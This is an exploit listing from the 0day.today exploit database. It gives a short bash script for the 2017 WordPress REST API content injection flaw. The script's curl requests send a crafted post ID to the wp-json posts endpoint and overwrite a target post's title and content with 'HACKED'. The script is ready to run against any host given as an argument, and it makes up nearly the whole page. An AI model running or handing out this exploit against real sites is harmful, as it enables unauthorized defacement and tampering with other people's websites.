[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress wp-json Content Injection Vulnerability

Author
Larry Cashdollar
Risk
[
Security Risk High
]
0day-ID
0day-ID-26942
Category
web applications
Date add
09-02-2017
Platform
php
#!/bin/bash
#Wordpress wp_Json API exploit
#Larry W. Cashdollar
#Discovered by Marc Montipas
#http://www.vapidlabs.com/exploits/wordpress_exploit.sh.txt
#https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html?utm_campaign=wp472vuln
#Usage ./exp.sh target 1 or 2 

if [ $2 == 2 ]
  then
  curl -s --url "http://$1/index.php/wp-json/wp/v2/posts/12345?id=1T" --data 'title=HACKED&content=HACKED' | indent
fi

if [ $2 == 1 ]
  then
  curl -s -X POST --url "http://$1/index.php/wp-json/wp/v2/posts/5" --data '{"id":"1k","title":"11Hacked1","content":"11Hacked1"}' -H 'Content-Type: application/json'| indent
fi

#  0day.today [2024-11-15]  #